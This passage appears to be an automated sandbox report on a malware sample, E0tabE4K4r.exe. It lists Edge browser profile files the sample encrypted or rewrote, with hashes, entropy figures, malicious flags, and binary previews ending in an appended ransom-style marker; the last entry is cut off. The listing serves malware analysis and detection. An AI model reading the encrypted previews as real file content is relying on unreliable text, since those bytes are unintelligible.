                                                                                                                                                  MD5:FD422F8F80D9E78A30AD8EF7DCFF9795
                                                                                                                                                  SHA1:B0C610559521BB228233BD40F47A0E8CE5955720
                                                                                                                                                  SHA-256:1E826E33B64EBD58F39EDCD5A1B258FFF8FD6F4B923EC7954EBB2BF926AF7F1B
                                                                                                                                                  SHA-512:CBAC9D7CD6D924C56A71F1AF61AC15764D9C871EBE541C8F274EA93A06222D147594BE09AB57BD32C46A16ED1986E731C4D45E4B8CCFF829672A19B1082ED3E6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:2023/>.-_...C....&b.u.@..f:..W...(.&.....K..>.K....[T.Sl_.w..4...l...k.....#..l>.mb..-......V.y.. V..U.i_.g.~!RZj.{.,./..{.............R.....ZX[.....J.#.....a.....K.S.o/..........Z...).^..WNo....d.._@R....=$..~!xT..1.?...9.9hza.[..8.....f.9f.5.g"Q[.S....vg....(.........0..Q:.h8/pO.[|....Kh.....4R....h.tk.)H??.......ahix...v.x...)...n...Z.Q..%1........7..c.Om..S.\..]\..^..gE.V.j*..T%......../G0....<...mo/..0..>..iV.>..p.A...WB.......Wch.d..-..U.cG.d].o......w.......#..Q.~..R[k[.h(....../-.%\0XKD...t4..2p"..M.l..kec.....S...$>...<..z.r..=.]...w@...'...o..-F`D.a.>&v.L...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):33102
                                                                                                                                                  Entropy (8bit):7.994354702167443
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:WC4vJD+wPfGtbsGY/xs3rjKmH3VZXQxejuzW+VXC:WC4vfPf5GmGKCLXQxejuSIy
                                                                                                                                                  MD5:1BD0ED8FFD3AE98C2BA50C3108613253
                                                                                                                                                  SHA1:7633E6C7694D878E55BA7F5FA4F80E92FB13EBE9
                                                                                                                                                  SHA-256:D3EE228E251087A0F6FB9960CAF65A668C8EEDF0D3DD26D20AA204F2C54ECBF7
                                                                                                                                                  SHA-512:12EF0F9EE68589CF59F66813C6DA9CE956205C1A675385C83F86F4815322A5E324E60995ED57F6DC07DD18C04A79AA5146DDC837FB9CD21D8C004FFA1EE08043
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:SQLit........+u....w..(..0.....O.oWt......~.<../.....4V.^...+....xi8:.....o .[B)....N,.a.l.+...v0...4..BvN......@.;F...)I..sI4....a4....*E.m....9)....Ki%.(u`g....s...tR.b.}.,m.E....<...&.s.*.....-+.E}..b...0mw...Z.....(.W...F....c.J..g'G..=..f].!l..`-Z&..%....?..M.8k.k..~...`..7tS.]k..P{.....#..^F.1d.H.$f...d.-.v..Y?.....s.K..4vl..\>-.......Kz......+.....2M..f....w..o.q..S9..9YD......I.Q.....\..........1.....-..;.}.=...?Q'6..P......2...2<..N.S..F..X......L..L........R.9...........#.v.h.....K...f.|-|...8...$z.......18Ty..v.g...z.i...^. ..N..B.V).pA...Xdx.#....sW...a.D......ITU.i}Uu}..<.lhd.z(B.0L......:.p. 3.O.^p..j..)*...\.z...su0...O...C..qxm..').&...yf.[I`...t..?s.B...lp..hWA.9`K..qM.2+...h.Q..WbAw.Zp&.u.....Z..@.e..`T..i...qyO.Fj..,..z._X.....u..v.tT.l...)F9uT...(.W...W........~M!..........9....9E)..`@Q..8>..7.".....?...R..p.i.&...rF..ka......-.........Hm..EX.U./.[SL=..f.i$...yz.-..j'..:.5<..9.".[........../..eY...S....G..c..y.wGy..H.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):20814
                                                                                                                                                  Entropy (8bit):7.991457903490913
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:384:9jsph8r9CRMP7uZi3IZlQuVenz0UVAHxt+pWZFILDsP60uT6gMJfgJE:9jlrQC7wZ2nz0emxAAZio6V+gMJGE
                                                                                                                                                  MD5:94B6BA0437D0963A34C602D3DB336A6A
                                                                                                                                                  SHA1:3B1575486067F32FD2EC73C59A4EC52D3C86610C
                                                                                                                                                  SHA-256:239D86F731C72770E82BF3EEC3CA3EC39C49E95F6456573643BAB08AFEF1D0DE
                                                                                                                                                  SHA-512:773F79D26612EAD4AA02CDEDD703F5C06F2E86917560E5E0B4D8B07E12F52B37129F95C555C9CEB1B0C462FDD9C91AA46B03B100166029100104CFC4537A61FA
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:SQLit..:I...h..+h.s'I..>7...Vn..Q.....E.<!.Y....Xd..WFg.?...8@.d..u..\..*<Y...Y..e.b.....0.]8.8t7R.`..'..i..,..'.......{....H......R;.f.-.^|.8\..o3.k.t...32p..wmY..Tz...M.....h>{.-5....nN..V{t.j.Ar.7.oD..T.5.../i.5.N..C..xMX.......h...d.V.f..U...kj.Ub.E.....,.K.....w>.....v.....;-......p.#.Q.U."...V(AO..i..*P1t..[C...0...pr....~nk.l.o.y.s"M...$.j..sbY.7.`.4.C?.....P`.8.-...F$`..!Wu...q............*;.].\...*-.....'.]...K...?.b.p..z.q.....,...B.NiF....W....@L.8...3.@......F....Qbp..t.96.*j.9*.VQk]I.^$.v.K...i7a.U%./.l2.l..oS...D.hmVNL.z.W...P....f.^....u.]...fS".g....Zm:.<...>4.......2......#O.b....R.S...r..._|........r'......0E.......{.G....&.x...`r..b.....*>..N..........c..0.N......A.z.T)y..$.>](.$.W.Q.....%....'#.q...G.W..t..zs.%|<..9j.l.&'.>...%...5S.n.D...U..C.W^..A.aY.D..J.^n....P5r..qvu..u.......\.M.9.....g...o.5.G..A.*;./{.I/Q.xs....w.....2Z.+...aH[. };..n..E..0.w(......b}...).1Vd..cV.....nQ..I.^+......Ov.[.*/(...d!...C.Zg...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):543
                                                                                                                                                  Entropy (8bit):7.530386895687818
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:qs3IEOvGNyhBzuV3KrOk/101ewI7IlcBRe4ABEBlwmsiDiceZYFoLSUdNcii9a:A2+WKrOk/101ewIehussiFOWm2bD
                                                                                                                                                  MD5:D6B5410AC5203A0DBD26971A390BDEFA
                                                                                                                                                  SHA1:445476C8449B09F13DAA4F8A817FE8A186ED1A40
                                                                                                                                                  SHA-256:CFF11FA36488F9E365A5F172646C2967F1FA4836CE435BF5FB12D9CDCC763B93
                                                                                                                                                  SHA-512:A31FAD7A32D692E8476A54CA00429B38E4BB1B1BD3378F58BC92FCBF1402B07D06047D39517C756FB7D270487F5DEC4A7CC570FEF0005E119E14E700EA078422
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.f.5...k..yK..../.{..?.*Cu&J..{]0E.^<(.A.9..WX..Z\+.:.[m1....F.;..g.7..n5...s....O.b..C..........b.[.PKwO.z....p..$l....M(B..ao.$..J..L..|...^0.....7u.O#.....(.\6.pK...-.^./..]...._-.A...~... .1e<..q[.....'xz.~.kZF..`dc..d!u2..~..M....&Y.e_.5?.M.a3..f..............c%.G....%.'..%.N5....5.?.'.z....g)5J...'r.9Z.. '..n.R&l.j....J..*!.-:..$[.=.5........T.<`..:./..V..o(/Z.Z..1.x_$.c.,.]_P...A...>....6..."w,........0"4.&.wV.......#......)...9...P. ...9.\.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):543
                                                                                                                                                  Entropy (8bit):7.568793438914846
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:qvOs5dx9E4DRzB0tRVHSTrbUs5o7K7/Mk4F/uhM7mqWSUdNcii9a:6Omdx9dVBcRVyTrd5o7K7EkQFV2bD
                                                                                                                                                  MD5:24749EBB9826C79E3DBE88AD9BC841BA
                                                                                                                                                  SHA1:111AE95DBF357F7E7562DA82C60243D746ABB4C0
                                                                                                                                                  SHA-256:DA5619C06D435A557B61AE1669BD5159A61F5B226FA6B43122B3CAB30618B607
                                                                                                                                                  SHA-512:05C1FAD39B7EB8F82B7E4C210CF58C8CCA7F19B1E669B433960A3F08DAAD59991AE42E61D56DD0B10B9ED656523F501EBF1160731753400F5A944E844FB60E98
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.f.5..3....D.?.u%....g...l...G.g.....Q.....6..K..xNURO.O.f..C;D..,u.SC..C.T.ekp......X..../H.......B.6h..t....e.-...#...A.I7ca.XI9z.P...d....}......;.H.U..I.c...nlW..6.=V..bj..S....K..77......{..t..q+.fs...&ls...p.f.l.7.2...]...'..788.\*7.._.U.VJ..t...M......o..T...}..m.........A.+.8.].....(..\.$.&.J...= .o.......5.~/.!}.J.....+2!. a+..b...6.l..;.........gR)y.Sg..s..].e@.k..Gy.....G.O_~.\.a1kd..?.._o..XrN......"\.....C.....Q.....'.E8...5.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):961
                                                                                                                                                  Entropy (8bit):7.749621886599843
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:SahUBEtX9u8+YRDgtsK1bUp2vAIckgHGy/XenLQ2bD:5JX8nYRDKsK1wprH/XuLDD
                                                                                                                                                  MD5:6A1BD4F2103D0C9B41C679F666F611CC
                                                                                                                                                  SHA1:6DFF7CFB4E252F0FD402F98F3B383D38546FCF75
                                                                                                                                                  SHA-256:949F5AF05104EC4F66BB7726F9A37D3E4A42065FEB5DCFD3EDB2AA6229D3E39F
                                                                                                                                                  SHA-512:1411BEE9CD08500D328110A52293060884231A767F2C4C04C02F179098D0165CB42B21672840A26024F08FCC74D29B3218CAE2820968D0D001B25ED5C3BA158C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.f.5..7....#.~.5......2.L...FV......F{.4N...r...G.y........U.w...-...NL{.C..._..j...|.e.'.-U+F7.a.NW....3.3..\.n....;H..v.cB...6.e..I] c.Ug.3.&t..di.F.h.T...s.g.]...Q1.Wu...o....D|.X....2.y,C..@.....!..qY.No..v..z.Q...(..>v.z.>...C#Y.e.|n...[.Z....5wm..M.'.T.1.....J.p.#..`7....@o>?....'B.._<#..w.Z...b.f8.._?..0V.....pb...{..7..JwG$...~4.9a............>tL..1..,$...c...w:.b?...W.....WE.(Gg'..d.?...&......"L.R.X.;....2cLl....m...m......>..-.e.4..n.A............+..V.|.....R.........N.K:...Q3Dw.V..5`u;B.>.8.s....v..]Yu...).{.;.j......Dk.......&..3.>..o.>...X.._..u..6.Qd.g.........t......y+./.c.G.l..!xt..#..0.6H.>.D.B..>....X....[...-..O..Q...=.xy%A.>.-].H..r{.|.....qZ.1..7E. ...v....N.F.w.H".....=O\...B..0B....&FXQ...oy.\....oNb8..9..ZT,...c.....`#5...BM....5.nd}..J..~..Jlj.......|>.\L}p`.......^Wqf>I.=..G..+whR.N.f....(.}F.hlyy9.]x..L.~..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):656
                                                                                                                                                  Entropy (8bit):7.68821402306953
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:kxssT2i37mZfpsgdFibp6Z8txtAwwDehHVKnp4GHxMrf/ADgZSUdNcii9a:QCkghsg0p6utxtAIoxRkX0V2bD
                                                                                                                                                  MD5:438B4BCDBB2C1C7D51CDCA3BE4DB00CE
                                                                                                                                                  SHA1:8C04861BEF544C3223C0F864E2D6CEB4424E3314
                                                                                                                                                  SHA-256:1F37AAFF3E9DC16142FD11215F38B85ECCD9A9E03BE80B415C44E8D9E1AFC3BF
                                                                                                                                                  SHA-512:54DD3F5C4A71E7E861AA2A7DB075569C732256F82D4C167BAB4C86954550134F42D666A5D93F749948E8381CC594DDE24E7141AA80486EB04805890D5C60F21B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:2023/..~..j.$..hOP..Kq>Z.u7...`..B>r.g_B..A...s2. -o.k5.u.!.........Qis.1.^n..e....=.2..#..k.X7.{t.).rY..^.&.4.UZ.U,.......|..t\...JS...i>..F*s....v*..o..N..R.[.dGa.T.po.qnM..X..8..5....d...........|n/N.v.#6.Ls,...)u...X..........-....cWTJ.*.........Sw.....WEwF....i>c..../...V(:........K/...o.......xq.....!.....zq.......8.AI.oP...k..>.I...k>@Q|....|Wo....7.J|..r.mo.3..0<.3....._.Kg.....V+qI. .-h.Y9N....%.<.1#^..S.T.f..~9.>i... ....u...x.\W}.........FJ..d'...m.$._...2.@s...5.$.h...^...y..s.....U.NT..kt....G..(..]....u.S..%!6.....;.jE.>.. ...Pt.....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\128.png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):5316
                                                                                                                                                  Entropy (8bit):7.964286742757289
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:IK+eKc8w9yxFp+gcwAUDkThjk+WbBmLIJDwmHjh1Zt900CP2jm+ZSUMYLrvWW:IK+xcr9iXJAPjk+WVmLI2mV1x00f3IYj
                                                                                                                                                  MD5:1360DAEEBA58D38496D0C1DB7D626F1E
                                                                                                                                                  SHA1:9F420CBE1D82164537710A95F3D3050532C8DDAD
                                                                                                                                                  SHA-256:85FA3A00AAA134BB27C57E65A64FCB5CAAA049418E72BB508E4F54BE2AC5753C
                                                                                                                                                  SHA-512:8959B6E8ED8E89B9A85A4EEB9E6DD7A0362F35C63B1434711A7735BDAB2985F3100FCC3042B19AB2AAA2507D10200DC371F64613243566FD3B79F9BDCCEC3BF6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.PNG.fU(.Z...;kF....b...X...W-.....,q.W......IA..L.........Y...<.E..W..u.#&U....3.ZQ.........p.v.IG.Y....L.u..P4..u...8vk.......s............v#.>k.<Y..T}.h...X.E.(....S.=m...Y.0yK$\...&..%8.E:.W3.e.=.....,P.p;i.[T.h0.8.vZ...H....O....k....X.,......M!.F.Inem.4....uf....(...N.......n...e. ....\......Yc._...'...g..i|'.....{).((..Y.}.y.Sj...1..j.L.......Y..Q....&-......A..~eE..q....Spwe,.>..r...PY..U. 1....Q..=../...Pu.....Qsa0,MA.i.......n.!{-. vcj.0..d.....*.i.76....c.....q.n=x]..9......>1..Z..*......-.TR..N.k.R.#.F...*....z......{.x.\.s.....ys5.]V..=.f..=...4l..~.x8@$x.V.h4..x.v.}..5g2I.V...:ja.c4.C.H....!-.%w...t.aXh..L.....K.T..R.......t/|h...gdA.pLq....5....ol....M.<*p.....AI..nWj.`......5.........~<Dk..$.+._..-.q..V.}.YB.. .F.s..g.vh...\ ...3n.\....2.r.............%#.....E6..h..m...^B..DR....v.%..._.y......7'..%.wa............f...E.)..Z..3m~..X........%.&Z2t...G....M\....-.........d.....{N....\)...i.Ak7..k....X.*..}..J.j......0....t.Q

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\dasherSettingSchema.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1188
                                                                                                                                                  Entropy (8bit):7.8149338053446336
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:v+L+m49mIaDdczpNMflnCrrvTb1vFx5Xb/oK7qd59Zh2bD:v+LtimtflCrzTb1vxLoJMD
                                                                                                                                                  MD5:9169DDCA1F64D38407B8633D7A689945
                                                                                                                                                  SHA1:9D54647D7E546D719690A269B603680BD4A66F00
                                                                                                                                                  SHA-256:F76AF8E2C0A5987F104C3D2AC226F0F44843F04A796334FC3BD99A0101C0E9C0
                                                                                                                                                  SHA-512:A55439010D3A8DB932D34A65AE5D97BD6A94C58F7BA417A9A0A0CBF2A4CA0DAC68999A53A3598D3156FB421BB4B55C3E3509F4AFD8E7445FA4E3B0F6AE9CDF72
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{. ".Y.hQ..i+k...".<A.. ..\.......4..x6....tM..Ha9@;z.\...G.A....s..&..Q..M.&J...^M..>.%D..@.....H.....3~bNX.. )K...D!.O..Q..~.......".}.\....C..S..7......9...4.1.Q.Dv....q.W6.O....t%[...............(...,...`...a.o...6JztJV<.xR...@.WhI..^'4D.QL.4C.M...gw..".S.F..Y...k.-G.....^H$....Qk./.\.w..Y.K..=g..N...%2.`.......,.r...`rh7 ef.]..#c...YJ..nx0@.......'..sz..s.t.c.C.........q.@.Y.=.`.0@.../..tt.Y.%OXZF...@.)...=......l....S.\...........i.3.q.......6.F.M>.71...L.~.....6*....].=.....k^+qY..7D..z(.A..FK].uY...n..._QC$.8=SIhg".jS.5K..D.*y....Patv.8.Y..mm.t.M..`.d..Apu.....e4...).f...%..D..\T.Ah.j.Qw.F..........k..V......V..{.zEw]...!.y..\n..d........s.'..Y..$.#..7.^..$\.,LB./.WO$]._.hb+i.D.....x.aw.....1..<..R..X.o..a..@.f..~Y.Vd;".mA..7.|[..s.`.m........m.'. ..B.Pj'.8..%...4..XB.......(a=...`E@......9oA.XR.(...v...d..i..J..T..../x../...._.B..u......@.t..^......R.....BuS...q....pK.....l~m.f....!d.J...."e.Dm.6e.K).b.|.\2..s..0...0.|.%....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\eventpage_bin_prod.js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):80603
                                                                                                                                                  Entropy (8bit):7.997939791189235
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:kmBH814WmMLYhZb9mbAPN/Gvc5/XQ+ux5NmU/wL7TgqOFC3u9Cd2:kCUxmMLYhZbyoN/GE5Y+uJITgqOFCMj
                                                                                                                                                  MD5:3819A4D9FB4A9F06632F8133F55DBF6B
                                                                                                                                                  SHA1:EEFD5910AD8EBCDC56689974ABBA28F86286048F
                                                                                                                                                  SHA-256:0E3DBB72DC64EC89229F63157C0DBE10452C1649A6C57A2BFE8969E7216C4D05
                                                                                                                                                  SHA-512:C943807BDA0FEEE46210F7DB61F5C79D800D45FCCB193C7A6230F5F5154DE3B245F576D893289B3E2128A4A1C2F123445C1B8521E23BBB8979720DDCBD82AEB3
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:/*.. ..X..G)......#..`.|..#..O....<.@=.gN..23[..@:.)../~.oCf(..-O/.y......../..l.fF....t.1.Y....... 3...]....h?..*...>..<.sO$.\..F...l7..t..@H.(.....lKs..fK,..f....m.lm.....;P.N4^..RnQE..N..2.a9.[....>..P/.p!...(...1...\.b..[r......&..oQX..Cq..&k....v.R.>r...Q....5..4s1...=.......Ef..z..)...?..7..o6..[8..!ep..A..Cy....xg&.$mX..!..,.|..G..>>.<.]$.S.&.!3$..]5..Q.....6j...B.u.......s...........4.iQv.8.n.og..fh.c.0............EOM..q...QO..g.~?'...A..A..=\....5A.55~..zZ.....[..F...P.8.\......:...6#o.mh.7.V.P..*c.lZ.p.e.n>..[..Lw;...T}&O.b.h@AV ..oB.f.n;.....9.b@C_....w.2....s?...-s..2.R.....o..8.<..ey......B..."C........"p...D.g.@h(.vi...1H.n..pb.9.O...g.@U$.K...@...;.eai_.4...j...v..}.fWLJ.s'e -..xY.]*ko..xj......<...E.5.3..V.{...u......&F..rRga0oR.7..F].).4.......c.c....'I]...p.....oC2.ofW....1.=N.M}r5|...[L......l.=....6.......h^}f..P.......*.....S.4.....E.'...b..\.`zZ...!..4.^E.........q=K7....vu....-.5.d..{x,.+b..E..l....+Y.$B...7.......S.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\manifest.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2731
                                                                                                                                                  Entropy (8bit):7.925219044530798
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:L+OiwZk6N5NLSVCrACMhJwvSu2yU+9Urk420pU0IpswrBIiLA9FTYV40kVfguD:9iw/NLRrACMwvVgG0IpXFRLYFTYVVsgW
                                                                                                                                                  MD5:FAAAB71603CAC941BC27BAC8B336948D
                                                                                                                                                  SHA1:510043B7F6C114A2C22737918F16DB29BB18EA8E
                                                                                                                                                  SHA-256:937B28E0BCA048DFB4ABD3C3E81E498CD5FB063DAB0B1719F079D1EFF9A7BB9F
                                                                                                                                                  SHA-512:3BD0AFAD0AAA51330764B7857069E73583A29A7E851697B3BA245C9513C20E7275C0B94E664BAE89D3C17CC8DE795E554C090F1706FB810B3EE07E7C479E88D3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{.. lp..S.BI%v.).^....../jZ.....^...4.(.U....0F04.e.=:..'.$....&"VT.....(7....v....2...c,.GO.G.+2p.-,.\ ..".#k.A.....J-..Mu&s..~.+Y..|.!...o.]5.g.O..\.zmt...........8.K..'e....kq.&..~....W.`NOI..jr....+2..8a.D.**.......$..G.$..w.P.#.....C]p.U_..~..r...O...v8..?4R.T[...,...T.T...1gxZ.e..V......X.k..I...~......../\.\..:..v......>.'..q-_.d.;q.....".O.a....Uw.......1....q....ir ...n.....n..}G....9.L.hD...........B...8.<r./..,.n.!.'.j.-=5.7..u..a..\.D..~s<.wo....I.......&.8....c.)..uS.6........z...#..`k6..}...B.n-Nn..Gx-.......j..N|..}..C.U.*..L .[.?.L,.....A.'.....H...W G......19.B....1.J(...A;..'.-:...T.ur+......(........}b..("..ZZIk.s@...z..e.41.....3tl.4bUE#.V.-..b.%......c.-....DR.5iQ'.....p..Z.!nNO-s.../...W.......)..9`....o,...h.&s#...b.T.%..|..&..)@<.fv`Z~...}../...\....-a.2.9..V....)..p6.'.<B..S...0.'..lS...-.H.0...SXoG0X..S.9:b..k..qb...|.Z.....s0.CT..|.^....$....B.t..!.....D..pK6...G79o...lrF...B..|GzE...`.m.....D.*......>.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\page_embed_script.js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):625
                                                                                                                                                  Entropy (8bit):7.671940383275399
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:2THfxIGYTCyUJsoXrJLxz/kcwwr61A5pONRSUdNcii9a:2zfxvFV7/kcNriU4m2bD
                                                                                                                                                  MD5:6A35131DB09618B058ABA4F935445667
                                                                                                                                                  SHA1:974C069B79D31CB7DE070FDC002F22E8CD4DE007
                                                                                                                                                  SHA-256:90E0124E02AB616811875FEC94531953EC2B6F99C5E667F67958B0B9D2F8C81A
                                                                                                                                                  SHA-512:9C937363EEBD140352F3AAB2C7C2CE4C530404AD5B54AC4FCE11006DB79418B8F2498C389EE9730B8FAAD782FA62CD6855C0E2B8735A9F1767E197B34B19788E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:(func.F_...?..z.]G...>.j......J..dE...v.........Pn V..g..c......r$.X.[.A."Ymh.A/...#/...=..>.Q@.9..G...{.e...M<2.E........y2.X.q...58.CwB...H...|....M.I...mR...c...85...O5..k.0.,..I............?..-.+.2vre.DK...>0..N...W,7K\)@/.l.l.^........Zqe..^VD.....z..F...Y.$....J..b...I.....,oH....Z..\E..v;/..ng5;..J..`s.:j....)...g..L0. kja. +.7.+.H.h..z..a.}...YD..gD.9.2.k.O..I.<.......=..u]GE.Y..Qnl....."sv..\..#..Ri.S...v(...$."`..Z.k;Q..$.......vl.di.NU..o..C....)..._N.K.ES.@.'>D..j.......GA.8..E.U...1.(I.P...>.....5.C...?J.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.0_0\content.js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):9751
                                                                                                                                                  Entropy (8bit):7.980053073857486
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:fKZWo0dcp59d/81TjSJS6LsdPd8muvvXzdU9VWlKEiZI2jobTvgOBHYpkq:f606p7d+jSJS6Ls4mmvXpIWUEiZIuCTa
                                                                                                                                                  MD5:7FACB9B987698A0B0867650AD1C7482F
                                                                                                                                                  SHA1:186205EAE85D5D7552458A938D34D0EA5706CBA5
                                                                                                                                                  SHA-256:6963E10C942946371D55F0AEE925AE5B65106E6C3A98FC514052F066C20317E5
                                                                                                                                                  SHA-512:EA13B22CE263E5845CE2B677373F1B021ED3D23E6214CD368BDE8EEC3C4125CD0E1F3EEBEE4A7F637F4544115D48E6863549BFC793B46EF539DF065789D31519
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:(()=>b.S....;r.}.....^_.M.r.va.!M.G(\...KG#WB....*.,Sy`..V.oq.Z_.-.....e.x&...{,."..e...........~O.m.8.......L\.5.x.:j......@...[#...G...g+2CKT.]./...0.9:A.q.......U......)..z.[o...y..8. ..u..wa<...Q.i..Y.1..&H|.C.+.^^.......8u.......{w....Zbf...<...Bg.....k=.+\.H....K..X...i..84a`.\..l...........u...p..........h...7.W.t&....v.?."ML..rf..H..U+m.9......`.l.....)k...Z931.,.#-|.......>.....A..N9.L.&.w...;... ...x;&.'Ux..ts[..<.X.I....+....$...v.*;.f=gI..s..dv.!B4.&...5..Ux\.DE.gf.r~........M.{}.yY..?k..G.)0....>....U.....cw.....)....A..}S#....n..]'.(0g^.O0wc.uN!..^.:[I..3...D.e....b_....2.&..............]..|....oL.=.+^...=....J"P.(.J..AX..B;.=V.9..L..;....S....cc"N...*.Bz.[# 8+...iPfg...f+..7..?...........!c,......n.....a..|....w.@&...!"..&.....t...#..CtR.....)..[Pmza..9).+.%.`...n...Wr..............."kqZ...B..(.][. ....tWG.+J..O...=..k].Z.\..;...w.M_W....s<]v.<.!.+..W4......c..C..T4.."..tA9........z(.P..M.6cQ .........\H......\y(...le.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.0_0\content_new.js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):10104
                                                                                                                                                  Entropy (8bit):7.982375399895036
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:MArDq3mfAbkN1YXcdZzipwrVzdsS3Kqn7fELJGkQedpjFDlEclaMYdnrcJxmHWk7:7rDq3gYXcQydsS3KqneJG/CjDlE0addV
                                                                                                                                                  MD5:3F1C1E39C0B1FFD35EBE0222A69485FB
